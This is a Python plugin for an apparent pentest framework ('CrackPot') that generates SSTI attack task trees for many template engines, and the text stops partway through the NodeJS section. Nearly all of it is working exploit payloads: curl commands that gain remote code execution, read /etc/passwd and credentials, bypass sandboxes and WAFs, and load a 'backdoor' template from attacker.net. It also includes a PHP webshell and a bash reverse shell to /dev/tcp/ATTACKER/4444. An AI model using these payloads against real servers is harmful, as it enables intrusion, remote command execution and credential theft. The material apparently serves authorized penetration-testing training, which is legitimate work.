"""
Server-Side Template Injection (SSTI) attack plugin

Generates tasks for SSTI exploitation across multiple template engines:
- Java: FreeMarker, Velocity, Thymeleaf, Spring, Pebble, Jinjava
- PHP: Twig, Smarty
- NodeJS: Jade/Pug, Handlebars, Nunjucks, JsRender
- Python: Jinja2, Tornado, Mako (advanced techniques)
- Ruby: ERB, Slim
- .NET: Razor, ASP
- Go: text/template, html/template
- EL (Expression Language): Java EE, Spring EL

Extracted from HackTricks: ssti-server-side-template-injection/
Generated by: CrackPot v1.0
"""

from typing import Dict, Any, List, Optional
import logging
from .base import ServicePlugin
from .registry import ServiceRegistry


@ServiceRegistry.register
class SSTIAttacksPlugin(ServicePlugin):
    """SSTI exploitation plugin for web applications"""

    @property
    def name(self) -> str:
        return "ssti-attacks"

    @property
    def default_ports(self) -> List[int]:
        return [80, 443, 8080, 8443, 3000, 5000]

    @property
    def service_names(self) -> List[str]:
        return ['http', 'https', 'http-proxy', 'http-alt']

    def detect(self, port_info: Dict[str, Any], profile: 'TargetProfile') -> bool:
        """Detect HTTP services where SSTI may be present"""
        service = port_info.get('service', '').lower()
        port = port_info.get('port')

        # Check service name
        if any(svc in service for svc in self.service_names):
            return True

        # Check common HTTP ports
        if port in self.default_ports:
            return True

        return False

    def get_task_tree(self, target: str, port: int, service_info: Dict[str, Any]) -> Dict[str, Any]:
        """Generate SSTI attack task tree"""
        version = service_info.get('version', '')
        product = service_info.get('product', '')

        tasks = {
            'id': f'ssti-attacks-{port}',
            'name': f'SSTI Attacks (Port {port})',
            'type': 'parent',
            'children': []
        }

        # PHASE 1: Detection & Identification
        tasks['children'].append(self._create_detection_phase(target, port))

        # PHASE 2: Java Template Engines
        tasks['children'].append(self._create_java_phase(target, port))

        # PHASE 3: PHP Template Engines
        tasks['children'].append(self._create_php_phase(target, port))

        # PHASE 4: NodeJS Template Engines
        tasks['children'].append(self._create_nodejs_phase(target, port))

        # PHASE 5: Python Template Engines (Advanced)
        tasks['children'].append(self._create_python_phase(target, port))

        # PHASE 6: Other Template Engines
        tasks['children'].append(self._create_other_engines_phase(target, port))

        # PHASE 7: Automated Tools
        tasks['children'].append(self._create_tools_phase(target, port))

        return tasks

    def _create_detection_phase(self, target: str, port: int) -> Dict[str, Any]:
        """SSTI detection and template engine identification"""
        return {
            'id': f'ssti-detection-{port}',
            'name': 'SSTI Detection & Identification',
            'type': 'parent',
            'children': [
                {
                    'id': f'ssti-fuzz-{port}',
                    'name': 'Fuzz for SSTI Injection Points',
                    'type': 'command',
                    'metadata': {
                        'command': f'# Manual fuzzing with special chars\ncurl "http://{target}:{port}/page?param=${{{{<%[%\'\"}}}}" -v',
                        'description': 'Inject special template chars to detect SSTI vulnerability',
                        'tags': ['OSCP:HIGH', 'MANUAL', 'SSTI', 'DETECTION'],
                        'flag_explanations': {
                            '${{{{<%[%\'"}}}}': 'Template special chars - watch for errors or missing output',
                            '-v': 'Verbose output to see server response details'
                        },
                        'success_indicators': [
                            'Template engine error messages revealed',
                            'Payload reflected with missing characters',
                            'Server returns different response vs normal input',
                            'Error: Jinja2, Twig, FreeMarker, etc. in response'
                        ],
                        'failure_indicators': [
                            'Payload reflected exactly as entered',
                            'No change in server behavior',
                            'WAF blocking (403 Forbidden)'
                        ],
                        'next_steps': [
                            'Test mathematical expressions: {{7*7}}, ${7*7}, <%= 7*7 %>',
                            'Identify template engine from error messages',
                            'Try template-specific payloads based on identified engine'
                        ],
                        'alternatives': [
                            'Burp Intruder with template fuzzing wordlist',
                            'wfuzz -u http://{target}:{port}/FUZZ -w ssti-payloads.txt',
                            'Test in POST data, headers (User-Agent, Referer), cookies'
                        ],
                        'notes': 'SSTI often found in: name parameters, search queries, template preview features, email templates, report generation. Context matters: plaintext vs code context.'
                    }
                },
                {
                    'id': f'ssti-math-test-{port}',
                    'name': 'Test Mathematical Expression Evaluation',
                    'type': 'command',
                    'metadata': {
                        'command': f'# Test multiple expression syntaxes\ncurl "http://{target}:{port}/page?param={{{{7*7}}}}" && \\\ncurl "http://{target}:{port}/page?param=${{7*7}}" && \\\ncurl "http://{target}:{port}/page?param=<%=7*7%>"',
                        'description': 'Test common template expression syntaxes to confirm SSTI',
                        'tags': ['OSCP:HIGH', 'QUICK_WIN', 'SSTI', 'DETECTION'],
                        'flag_explanations': {
                            '{{7*7}}': 'Jinja2, Twig, Nunjucks - should return 49',
                            '${7*7}': 'FreeMarker, Spring EL, JSP EL - should return 49',
                            '<%=7*7%>': 'ERB (Ruby), ASP - should return 49'
                        },
                        'success_indicators': [
                            'Output contains "49" instead of template expression',
                            'Mathematical evaluation confirmed',
                            'Template engine processes expression'
                        ],
                        'failure_indicators': [
                            'Literal string "{{7*7}}" returned',
                            'Expression blocked by WAF',
                            'No evaluation occurs'
                        ],
                        'next_steps': [
                            'Use decision tree to identify specific engine',
                            'Test engine-specific payloads',
                            'Escalate to RCE exploitation'
                        ],
                        'alternatives': [
                            'Test with string operations: {{7*"7"}} (Jinja2 = 7777777)',
                            'Test with errors: {{7/0}}, ${7/0} to trigger stack traces',
                            'Browser: View source after injection to see rendered output'
                        ],
                        'notes': 'Template identification decision tree: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#methodology'
                    }
                },
                {
                    'id': f'ssti-engine-fingerprint-{port}',
                    'name': 'Identify Template Engine',
                    'type': 'manual',
                    'metadata': {
                        'description': 'Use error messages and expression syntax to identify template engine',
                        'tags': ['OSCP:HIGH', 'MANUAL', 'SSTI'],
                        'alternatives': [
                            '1. Check error messages for engine name (Jinja2, Twig, FreeMarker, etc.)',
                            '2. Test specific syntax: {{7*\'7\'}} (Jinja2=7777777, Twig=49)',
                            '3. Test special variables: {{config}} (Flask/Jinja2), ${T()} (Spring)',
                            '4. Use HackTricks decision tree image',
                            '5. Check HTTP headers for framework hints (X-Powered-By)'
                        ],
                        'notes': 'Identification payloads: {{7*\'7\'}}, ${7*\'7\'}, <%= 7*\'7\' %>, #{7*7}, *{7*7}. Different engines have different behaviors. See: https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#identification-phase'
                    }
                }
            ]
        }

    def _create_java_phase(self, target: str, port: int) -> Dict[str, Any]:
        """Java template engine exploitation"""
        return {
            'id': f'ssti-java-{port}',
            'name': 'Java Template Engines',
            'type': 'parent',
            'children': [
                {
                    'id': f'ssti-freemarker-{port}',
                    'name': 'FreeMarker SSTI Exploitation',
                    'type': 'parent',
                    'children': [
                        {
                            'id': f'freemarker-basic-{port}',
                            'name': 'FreeMarker Basic RCE',
                            'type': 'command',
                            'metadata': {
                                'command': f'# FreeMarker RCE via Execute utility\ncurl "http://{target}:{port}/page?param=<#assign+ex+%3d+\\"freemarker.template.utility.Execute\\"?new()>${{+ex(\\"id\\")+}}"',
                                'description': 'Execute OS commands via FreeMarker Execute utility class',
                                'tags': ['OSCP:HIGH', 'EXPLOIT', 'SSTI', 'RCE', 'JAVA'],
                                'flag_explanations': {
                                    '<#assign ex = "freemarker.template.utility.Execute"?new()>': 'Create Execute object instance',
                                    '${ex("id")}': 'Execute "id" command via Execute utility',
                                    '?new()': 'FreeMarker built-in to instantiate classes'
                                },
                                'success_indicators': [
                                    'Command output in response (uid=, gid=)',
                                    'RCE confirmed'
                                ],
                                'failure_indicators': [
                                    'Error: Execute class not found',
                                    'Sandboxed environment (FreeMarker 2.3.30+)',
                                    'Restricted API access'
                                ],
                                'next_steps': [
                                    'Read sensitive files: ${ex("cat /etc/passwd")}',
                                    'Establish reverse shell',
                                    'Try sandbox bypass for FreeMarker 2.3.30+'
                                ],
                                'alternatives': [
                                    '[#assign ex = \'freemarker.template.utility.Execute\'?new()]${ ex(\'whoami\')}',
                                    '${"freemarker.template.utility.Execute"?new()("ls -la")}',
                                    'Read files: ${product.getClass().getProtectionDomain().getCodeSource().getLocation().toURI().resolve(\'/etc/passwd\').toURL().openStream().readAllBytes()?join(" ")}'
                                ],
                                'notes': 'FreeMarker RCE using built-in Execute class (older versions). For 2.3.30+, Execute is disabled. Test at: https://try.freemarker.apache.org'
                            }
                        },
                        {
                            'id': f'freemarker-sandbox-bypass-{port}',
                            'name': 'FreeMarker Sandbox Bypass (<2.3.30)',
                            'type': 'command',
                            'metadata': {
                                'command': f'# Sandbox bypass via reflection (FreeMarker <2.3.30)\ncurl "http://{target}:{port}/page?param=<#assign+classloader%3darticle.class.protectionDomain.classLoader>\\\n<#assign+owc%3dclassloader.loadClass(\\"freemarker.template.ObjectWrapper\\")>\\\n<#assign+dwf%3dowc.getField(\\"DEFAULT_WRAPPER\\").get(null)>\\\n<#assign+ec%3dclassloader.loadClass(\\"freemarker.template.utility.Execute\\")>\\\n${{dwf.newInstance(ec,null)(\\"whoami\\")}}"',
                                'description': 'Bypass FreeMarker sandbox using reflection to access Execute (versions < 2.3.30)',
                                'tags': ['OSCP:MEDIUM', 'EXPLOIT', 'SSTI', 'RCE', 'BYPASS'],
                                'flag_explanations': {
                                    'article.class.protectionDomain.classLoader': 'Access classloader via any object (article is example)',
                                    'loadClass("freemarker.template.ObjectWrapper")': 'Load ObjectWrapper to wrap Execute',
                                    'DEFAULT_WRAPPER': 'Get default wrapper instance',
                                    'dwf.newInstance(ec,null)("whoami")': 'Create Execute instance and run command'
                                },
                                'success_indicators': [
                                    'Command output visible',
                                    'Sandbox bypassed successfully'
                                ],
                                'failure_indicators': [
                                    'FreeMarker 2.3.30+ (Execute fully disabled)',
                                    'Reflection restricted',
                                    'ClassNotFoundException'
                                ],
                                'next_steps': [
                                    'Establish reverse shell',
                                    'Read application secrets',
                                    'Pivot to local file read if RCE blocked'
                                ],
                                'alternatives': [
                                    'Use built-in (?api, ?keys) to enumerate exposed objects',
                                    'Try alternative class access paths',
                                    'If FreeMarker 2.3.30+, look for other vuln classes'
                                ],
                                'notes': 'Only works on FreeMarker <2.3.30. Newer versions completely removed Execute class. Source: https://portswigger.net/research/server-side-template-injection'
                            }
                        }
                    ]
                },
                {
                    'id': f'ssti-velocity-{port}',
                    'name': 'Velocity SSTI Exploitation',
                    'type': 'command',
                    'metadata': {
                        'command': f'# Velocity RCE via Runtime\ncurl "http://{target}:{port}/page?param=%23set($s%3d\\"\\")%23set($stringClass%3d$s.getClass())%23set($runtime%3d$stringClass.forName(\\"java.lang.Runtime\\").getRuntime())%23set($process%3d$runtime.exec(\\"cat%20/etc/passwd\\"))%23set($out%3d$process.getInputStream())%23set($null%3d$process.waitFor())%23foreach($i+in+[1..$out.available()])$out.read()%23end"',
                        'description': 'Execute commands in Velocity template via Runtime.exec()',
                        'tags': ['OSCP:HIGH', 'EXPLOIT', 'SSTI', 'RCE', 'JAVA'],
                        'flag_explanations': {
                            '#set($s="")': 'Create empty string to access String class',
                            '$stringClass.forName("java.lang.Runtime").getRuntime()': 'Get Runtime instance via reflection',
                            '$runtime.exec("cat /etc/passwd")': 'Execute OS command',
                            '$process.getInputStream()': 'Get command output stream',
                            '#foreach($i in [1..$out.available()])$out.read()#end': 'Read output byte by byte'
                        },
                        'success_indicators': [
                            'File contents visible in response',
                            'Command output rendered'
                        ],
                        'failure_indicators': [
                            'Runtime access blocked',
                            'Reflection disabled',
                            'Empty response'
                        ],
                        'next_steps': [
                            'Establish reverse shell',
                            'Read application config files',
                            'Extract credentials'
                        ],
                        'alternatives': [
                            '#set($str=$class.inspect("java.lang.String").type)',
                            '#set($chr=$class.inspect("java.lang.Character").type)',
                            '#set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("whoami"))',
                            'Use ProcessBuilder if Runtime blocked'
                        ],
                        'notes': 'Velocity template syntax uses #set, $variable, #foreach. Payloads must be URL encoded. Output reading is verbose but reliable.'
                    }
                },
                {
                    'id': f'ssti-thymeleaf-{port}',
                    'name': 'Thymeleaf SSTI Exploitation',
                    'type': 'parent',
                    'children': [
                        {
                            'id': f'thymeleaf-springel-{port}',
                            'name': 'Thymeleaf SpringEL RCE',
                            'type': 'command',
                            'metadata': {
                                'command': f'# Thymeleaf RCE via SpringEL expression\ncurl "http://{target}:{port}/page?param=${{{{T(java.lang.Runtime).getRuntime().exec(\'whoami\')}}}}"',
                                'description': 'Execute commands via Thymeleaf SpringEL expression evaluation',
                                'tags': ['OSCP:HIGH', 'EXPLOIT', 'SSTI', 'RCE', 'JAVA'],
                                'flag_explanations': {
                                    '${T(java.lang.Runtime).getRuntime().exec(\'whoami\')}': 'SpringEL T() operator to access static Runtime class',
                                    'T()': 'Type operator in SpringEL - accesses class by fully qualified name',
                                    'getRuntime()': 'Static method to get Runtime singleton',
                                    'exec()': 'Execute OS command'
                                },
                                'success_indicators': [
                                    'Command executes (check out-of-band)',
                                    'Process object returned'
                                ],
                                'failure_indicators': [
                                    'SpringEL not enabled in Thymeleaf',
                                    'Template must be predefined (not dynamic)',
                                    'Expression not evaluated'
                                ],
                                'next_steps': [
                                    'Try OGNL expression if SpringEL fails',
                                    'Use expression preprocessing: __${...}__',
                                    'Test in th:href, th:title attributes'
                                ],
                                'alternatives': [
                                    'OGNL: ${#rt = @java.lang.Runtime@getRuntime(),#rt.exec("calc")}',
                                    'Expression inlining: [[${T(java.lang.Runtime).getRuntime().exec("id")}]]',
                                    'Preprocessing: <a th:href="@{__${path}__}">'
                                ],
                                'notes': 'Thymeleaf requires predefined templates by default. Exploitation usually via attribute injection (th:href, th:action). Expression preprocessing (__...__) bypasses some restrictions. See: https://www.acunetix.com/blog/web-security-zone/exploiting-ssti-in-thymeleaf/'
                            }
                        },
                        {
                            'id': f'thymeleaf-preprocessing-{port}',
                            'name': 'Thymeleaf Expression Preprocessing',
                            'type': 'command',
                            'metadata': {
                                'command': f'# Thymeleaf preprocessing bypass\ncurl "http://{target}:{port}/__${{{{T(java.lang.Runtime).getRuntime().exec(\'calc\')}}}}__"',
                                'description': 'Exploit Thymeleaf expression preprocessing to bypass restrictions',
                                'tags': ['OSCP:MEDIUM', 'EXPLOIT', 'SSTI', 'BYPASS'],
                                'flag_explanations': {
                                    '__${...}__': 'Expression preprocessing syntax - evaluates before template rendering',
                                    'T(java.lang.Runtime)': 'SpringEL type operator for class access'
                                },
                                'success_indicators': [
                                    'Expression evaluated in preprocessing phase',
                                    'Command executes'
                                ],
                                'failure_indicators': [
                                    'Preprocessing not enabled',
                                    'Path-based injection not vulnerable'
                                ],
                                'next_steps': [
                                    'Test in URL path components',
                                    'Try attribute-based injection',
                                    'Combine with other template features'
                                ],
                                'alternatives': [
                                    'Attribute injection: <a th:href="${\'...\'}" th:title=\'...\'>',
                                    'Selection preprocessing: #{selection.__${sel.code}__}'
                                ],
                                'notes': 'Thymeleaf expression preprocessing allows dynamic expression construction. Often exploited in URL path mapping: http://localhost:8082/(${T(java.lang.Runtime).getRuntime().exec(\'calc\')})'
                            }
                        }
                    ]
                },
                {
                    'id': f'ssti-spring-{port}',
                    'name': 'Spring Framework EL Exploitation',
                    'type': 'parent',
                    'children': [
                        {
                            'id': f'spring-el-basic-{port}',
                            'name': 'Spring EL Basic RCE',
                            'type': 'command',
                            'metadata': {
                                'command': f'# Spring EL RCE\ncurl "http://{target}:{port}/page?param=*{{{{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(\'id\').getInputStream())}}}}"',
                                'description': 'Execute commands and capture output via Spring EL with Apache Commons IO',
                                'tags': ['OSCP:HIGH', 'EXPLOIT', 'SSTI', 'RCE', 'JAVA'],
                                'flag_explanations': {
                                    '*{...}': 'Spring EL variable expression (try ${}, #{}, @{}, ~{} if blocked)',
                                    'T(org.apache.commons.io.IOUtils)': 'Apache Commons utility class for stream handling',
                                    'toString()': 'Convert command output stream to string',
                                    'T(java.lang.Runtime).getRuntime().exec()': 'Execute OS command',
                                    'getInputStream()': 'Get command output stream'
                                },
                                'success_indicators': [
                                    'Command output visible in response',
                                    'uid=, gid= in output'
                                ],
                                'failure_indicators': [
                                    'Apache Commons IO not in classpath',
                                    'Expression type blocked',
                                    'Security manager restrictions'
                                ],
                                'next_steps': [
                                    'Read sensitive files: /etc/passwd, app configs',
                                    'Establish reverse shell',
                                    'Try alternative expression types if blocked'
                                ],
                                'alternatives': [
                                    'Try different expression delimiters: ${...}, #{...}, @{...}, ~{...}',
                                    'Character concatenation to bypass filters (see char_concat payload)',
                                    'ProcessBuilder: T(java.lang.ProcessBuilder)(...).start()'
                                ],
                                'notes': 'Spring EL supports multiple expression types. If ${} blocked, try #{}, *{}, @{}, ~{}. Apache Commons IO often available in Spring apps.'
                            }
                        },
                        {
                            'id': f'spring-el-char-concat-{port}',
                            'name': 'Spring EL Character Concatenation Bypass',
                            'type': 'command',
                            'metadata': {
                                'command': '# Generate char concat payload to bypass filters\n# Example for "id" command:\necho "id" | python3 -c "import sys; cmd = sys.stdin.read().strip(); print(\'T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(\' + \'.\'.join([f\'T(java.lang.Character).toString({ord(char)}).concat\' for char in cmd]) + \'()).getInputStream())\')"',
                                'description': 'Bypass WAF/filters by constructing command string via character concatenation',
                                'tags': ['OSCP:MEDIUM', 'BYPASS', 'SSTI', 'WAF'],
                                'flag_explanations': {
                                    'T(java.lang.Character).toString(99)': 'Convert ASCII 99 to \'c\' character',
                                    '.concat(...)': 'Concatenate characters to build command string',
                                    'T(org.apache.commons.io.IOUtils).toString()': 'Capture command output'
                                },
                                'success_indicators': [
                                    'WAF bypassed',
                                    'Command executes despite string filters'
                                ],
                                'failure_indicators': [
                                    'Payload too long for parameter',
                                    'Character limit exceeded',
                                    'Still blocked by WAF'
                                ],
                                'next_steps': [
                                    'Use shorter commands (ls, id, pwd)',
                                    'Combine with URL encoding',
                                    'Try base64 encoding if char concat fails'
                                ],
                                'alternatives': [
                                    'Base64 encode command: echo "cmd" | base64, decode in payload',
                                    'Use hex encoding: \\x63\\x61\\x74',
                                    'Variable assignment to break up payload'
                                ],
                                'notes': 'Character concatenation bypasses keyword filters ("cat", "bash", etc.) but creates very long payloads. Use for short commands. Generator script from HackTricks.'
                            }
                        },
                        {
                            'id': f'spring-view-manipulation-{port}',
                            'name': 'Spring View Name Manipulation',
                            'type': 'command',
                            'metadata': {
                                'command': f'# Spring view name SSTI\ncurl "http://{target}:{port}/__${{new+java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(\\"id\\").getInputStream()).next()}}__::.x"',
                                'description': 'Exploit Spring view name resolution for RCE (CVE-style vulnerability)',
                                'tags': ['OSCP:HIGH', 'EXPLOIT', 'SSTI', 'RCE'],
                                'flag_explanations': {
                                    '__${...}__::.x': 'Spring view name preprocessing with fragment separator',
                                    'new java.util.Scanner(...)': 'Create scanner to read command output',
                                    '.next()': 'Get first token from output',
                                    '::.x': 'Fragment separator in view name (required for exploitation)'
                                },
                                'success_indicators': [
                                    'Command output in response',
                                    'View name evaluated as expression'
                                ],
                                'failure_indicators': [
                                    'View name not processed as template',
                                    'Spring version not vulnerable',
                                    'Fragment syntax not supported'
                                ],
                                'next_steps': [
                                    'Read application files',
                                    'Establish reverse shell',
                                    'Extract Spring security configs'
                                ],
                                'alternatives': [
                                    '__${T(java.lang.Runtime).getRuntime().exec("touch /tmp/pwned")}__::.x',
                                    'Test without fragment: __${...}__ (may work in some configs)'
                                ],
                                'notes': 'Spring view name manipulation: path components evaluated as SpEL expressions. See: https://github.com/veracode-research/spring-view-manipulation. Requires vulnerable Spring MVC configuration.'
                            }
                        }
                    ]
                },
                {
                    'id': f'ssti-el-{port}',
                    'name': 'EL (Expression Language) Exploitation',
                    'type': 'parent',
                    'children': [
                        {
                            'id': f'el-basic-rce-{port}',
                            'name': 'EL Basic RCE',
                            'type': 'command',
                            'metadata': {
                                'command': f'# JSP EL RCE\ncurl "http://{target}:{port}/page.jsp?param=${{\\"\\"[\\"class\\"].forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"whoami\\")}}"',
                                'description': 'Execute commands via JSP Expression Language',
                                'tags': ['OSCP:HIGH', 'EXPLOIT', 'SSTI', 'RCE', 'JAVA'],
                                'flag_explanations': {
                                    '${""}': 'Empty string object to access String class',
                                    '["class"]': 'Bracket notation to access .class (bypass getClass filter)',
                                    '.forName("java.lang.Runtime")': 'Reflection to access Runtime class',
                                    '.getRuntime().exec()': 'Execute OS command'
                                },
                                'success_indicators': [
                                    'Command executes',
                                    'Process object returned'
                                ],
                                'failure_indicators': [
                                    'EL evaluation disabled',
                                    'Security manager blocks Runtime',
                                    'JSP EL not available (plain servlets)'
                                ],
                                'next_steps': [
                                    'Capture command output with IOUtils',
                                    'Read files via FileInputStream',
                                    'Test #{}, *{}, @{} if ${} blocked'
                                ],
                                'alternatives': [
                                    'Direct class access: ${T(java.lang.Runtime).getRuntime().exec("id")}',
                                    'ProcessBuilder: ${"".getClass().forName("java.lang.ProcessBuilder")...}',
                                    'ScriptEngineManager: ${request.getClass().forName("javax.script.ScriptEngineManager")...}'
                                ],
                                'notes': 'EL found in JSF, JSP, Spring. Expression syntax: ${}, #{} (legacy), *{}, @{}, ~{}. Try all variants if one blocked.'
                            }
                        },
                        {
                            'id': f'el-file-read-{port}',
                            'name': 'EL Remote File Read',
                            'type': 'command',
                            'metadata': {
                                'command': f'# Read /etc/passwd via EL\ncurl "http://{target}:{port}/page?param=${{\\"\\"[\\"class\\"].forName(\\"java.io.File\\")(\\\"/etc/passwd\\\").text}}"',
                                'description': 'Read arbitrary files using EL File class access',
                                'tags': ['OSCP:HIGH', 'EXPLOIT', 'SSTI', 'LFI'],
                                'flag_explanations': {
                                    '["class"].forName("java.io.File")': 'Access File class via reflection',
                                    '("/etc/passwd")': 'File path to read',
                                    '.text': 'Groovy GString property to read file as text (if available)'
                                },
                                'success_indicators': [
                                    'File contents in response',
                                    'root:x:0:0: visible'
                                ],
                                'failure_indicators': [
                                    'File not found',
                                    'Permission denied',
                                    '.text property not available (use FileInputStream)'
                                ],
                                'next_steps': [
                                    'Read application configs',
                                    'Extract database credentials',
                                    'Read source code files'
                                ],
                                'alternatives': [
                                    'FileInputStream: ${"".getClass().forName("java.io.FileInputStream")("/etc/passwd").text}',
                                    'Files.readString (Java 11+): ${java.nio.file.Files.readString(java.nio.file.Paths.get("/etc/passwd"))}',
                                    'BufferedReader for line-by-line reading'
                                ],
                                'notes': 'File read useful when RCE blocked but class access allowed. Target files: /etc/passwd, application.properties, web.xml, context.xml (Tomcat configs)'
                            }
                        }
                    ]
                }
            ]
        }

    def _create_php_phase(self, target: str, port: int) -> Dict[str, Any]:
        """PHP template engine exploitation"""
        return {
            'id': f'ssti-php-{port}',
            'name': 'PHP Template Engines',
            'type': 'parent',
            'children': [
                {
                    'id': f'ssti-twig-{port}',
                    'name': 'Twig SSTI Exploitation',
                    'type': 'parent',
                    'children': [
                        {
                            'id': f'twig-basic-rce-{port}',
                            'name': 'Twig RCE via registerUndefinedFilterCallback',
                            'type': 'command',
                            'metadata': {
                                'command': f'# Twig RCE\ncurl "http://{target}:{port}/page?param={{{{_self.env.registerUndefinedFilterCallback(\\"system\\")}}}}\\\n{{{{_self.env.getFilter(\\"id\\")}}}}"',
                                'description': 'Execute commands by registering system() as undefined filter callback',
                                'tags': ['OSCP:HIGH', 'EXPLOIT', 'SSTI', 'RCE', 'PHP'],
                                'flag_explanations': {
                                    '_self.env': 'Access Twig environment object',
                                    'registerUndefinedFilterCallback("system")': 'Register PHP system() as filter',
                                    'getFilter("id")': 'Invoke filter with "id" command',
                                    '_self': 'Reference to current template object (always available)'
                                },
                                'success_indicators': [
                                    'Command output visible',
                                    'uid=, gid= in response'
                                ],
                                'failure_indicators': [
                                    'Twig sandbox enabled',
                                    'system() disabled in php.ini (disable_functions)',
                                    '_self not available'
                                ],
                                'next_steps': [
                                    'Try exec(), shell_exec(), passthru() if system() blocked',
                                    'Read files via file_get_contents filter',
                                    'Chain multiple commands'
                                ],
                                'alternatives': [
                                    'exec variant: {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("whoami")}}',
                                    'Array filter method: {{["id"]|filter("system")}}',
                                    'Sort method: {{["id",""]|sort("system")}}',
                                    'Map filter: {{["id"]|map("system")|join}}'
                                ],
                                'notes': 'Twig SSTI via registerUndefinedFilterCallback - registers PHP function as Twig filter. Command passed as filter argument. Check php.ini disable_functions.'
                            }
                        },
                        {
                            'id': f'twig-file-read-{port}',
                            'name': 'Twig File Read',
                            'type': 'command',
                            'metadata': {
                                'command': f'# Read /etc/passwd via Twig\ncurl "http://{target}:{port}/page?param={{{{\\"/etc/passwd\\"|file_excerpt(1,30)}}}}"',
                                'description': 'Read arbitrary files using Twig file_excerpt filter',
                                'tags': ['OSCP:HIGH', 'EXPLOIT', 'SSTI', 'LFI', 'PHP'],
                                'flag_explanations': {
                                    '"/etc/passwd"|file_excerpt(1,30)': 'Read lines 1-30 from file',
                                    'file_excerpt': 'Twig filter to extract file portions',
                                    '1,30': 'Start line, number of lines to read'
                                },
                                'success_indicators': [
                                    'File contents visible',
                                    'root:x:0:0: in response'
                                ],
                                'failure_indicators': [
                                    'File not found',
                                    'file_excerpt filter not available',
                                    'Permission denied'
                                ],
                                'next_steps': [
                                    'Read application config files',
                                    'Extract database credentials',
                                    'Read source code'
                                ],
                                'alternatives': [
                                    'Use include: {% include "/etc/passwd" %}',
                                    'source function: {{ source("/etc/passwd") }}',
                                    'If RCE available: {{["cat /etc/passwd"]|filter("system")}}'
                                ],
                                'notes': 'file_excerpt useful for reading large files in chunks. Twig source() and include() may also read files depending on configuration.'
                            }
                        },
                        {
                            'id': f'twig-sandbox-bypass-{port}',
                            'name': 'Twig Sandbox Bypass',
                            'type': 'command',
                            'metadata': {
                                'command': f'# Twig sandbox bypass via FTP cache\ncurl "http://{target}:{port}/page?param={{{{_self.env.setCache(\\"ftp://attacker.net:2121\\")}}}}{{{{_self.env.loadTemplate(\\"backdoor\\")}}}}"',
                                'description': 'Bypass Twig sandbox by loading remote template from attacker FTP server',
                                'tags': ['OSCP:MEDIUM', 'EXPLOIT', 'SSTI', 'BYPASS'],
                                'flag_explanations': {
                                    '_self.env.setCache("ftp://attacker.net:2121")': 'Set template cache to attacker FTP server',
                                    'loadTemplate("backdoor")': 'Load malicious template from attacker server',
                                    'ftp://': 'FTP protocol for remote template loading'
                                },
                                'success_indicators': [
                                    'Connection to attacker FTP server',
                                    'Remote template loaded',
                                    'Backdoor code executes'
                                ],
                                'failure_indicators': [
                                    'allow_url_include disabled',
                                    'FTP connections blocked',
                                    'Network egress filtering'
                                ],
                                'next_steps': [
                                    'Setup FTP server with malicious Twig template',
                                    'Template should contain: <?php system($_GET["cmd"]); ?>',
                                    'Access webshell'
                                ],
                                'alternatives': [
                                    'HTTP cache: http://attacker.net/backdoor.twig',
                                    'SMB (Windows): {{_self.env.setCache("\\\\\\\\attacker\\\\share")}}',
                                    'If sandbox bypass fails, try object injection via map filter'
                                ],
                                'notes': 'Twig sandbox bypass via remote template loading. Requires network egress and allow_url_include=On. Setup FTP/HTTP server with malicious template file.'
                            }
                        }
                    ]
                },
                {
                    'id': f'ssti-smarty-{port}',
                    'name': 'Smarty SSTI Exploitation',
                    'type': 'command',
                    'metadata': {
                        'command': f'# Smarty RCE (v3)\ncurl "http://{target}:{port}/page?param={{{{{{{{system(\'id\')}}}}}}}}"',
                        'description': 'Execute OS commands in Smarty v3 templates via system() function',
                        'tags': ['OSCP:HIGH', 'EXPLOIT', 'SSTI', 'RCE', 'PHP'],
                        'flag_explanations': {
                            '{system(\'id\')}': 'Call PHP system() function directly in Smarty v3',
                            'system()': 'PHP function for command execution'
                        },
                        'success_indicators': [
                            'Command output visible',
                            'uid=, gid= in response'
                        ],
                        'failure_indicators': [
                            'Smarty v2 (different syntax)',
                            'system() in disable_functions',
                            'Smarty security enabled'
                        ],
                        'next_steps': [
                            'Try exec(), shell_exec() if system() blocked',
                            'Read files: {file_get_contents(\'/etc/passwd\')}',
                            'Establish webshell'
                        ],
                        'alternatives': [
                            'Smarty v2: {php}echo `id`;{/php} (deprecated)',
                            'Write file: {Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php system($_GET[\'c\']); ?>",self::clearConfig())}',
                            'Read file: {system(\'cat /etc/passwd\')}'
                        ],
                        'notes': 'Smarty v3 allows direct PHP function calls. Smarty v2 used {php} tags (deprecated). Check $smarty.version to identify version.'
                    }
                }
            ]
        }

    def _create_nodejs_phase(self, target: str, port: int) -> Dict[str, Any]:
        """NodeJS template engine exploitation"""
        return {
            'id': f'ssti-nodejs-{port}',
            'name': 'NodeJS Template Engines',
            'type': 'parent',
            'children': [
                {
                    'id': f'ssti-jade-pug-{port}',
                    'name': 'Jade/Pug SSTI Exploitation',
                    'type': 'command',
                    'metadata': {
                        'command': f'# Pug/Jade RCE\ncurl "http://{target}:{port}/page?param=%23{{{{{{{{function(){{{{{{{{localLoad%3dglobal.process.mainModule.constructor._load%3bsh%3dlocalLoad(\\"child_process\\").exec(\'id\')}}}}}}}}()}}}}}}}}"\n',
                        'description': 'Execute commands via Pug/Jade template injection using child_process',
                        'tags': ['OSCP:HIGH', 'EXPLOIT', 'SSTI', 'RCE', 'NODEJS'],
                        'flag_explanations': {
                            '#{...}': 'Pug/Jade expression syntax',
                            'function(){}()': 'IIFE (Immediately Invoked Function Expression)',
                            'global.process.mainModule.constructor._load': 'Access require() via Module constructor',
                            'child_process': 'NodeJS module for executing OS commands',
                            '.exec()': 'Execute shell command'
                        },
                        'success_indicators': [
                            'Command executes',
                            'Process spawned'
                        ],
                        'failure_indicators': [
                            'Pug sandbox enabled',
                            'child_process blocked',
                            'Syntax error'
                        ],
                        'next_steps': [
                            'Read files: fs.readFileSync(\'/etc/passwd\', \'utf8\')',
                            'Reverse shell: bash -c "bash -i >& /dev/tcp/ATTACKER/4444 0>&1"',
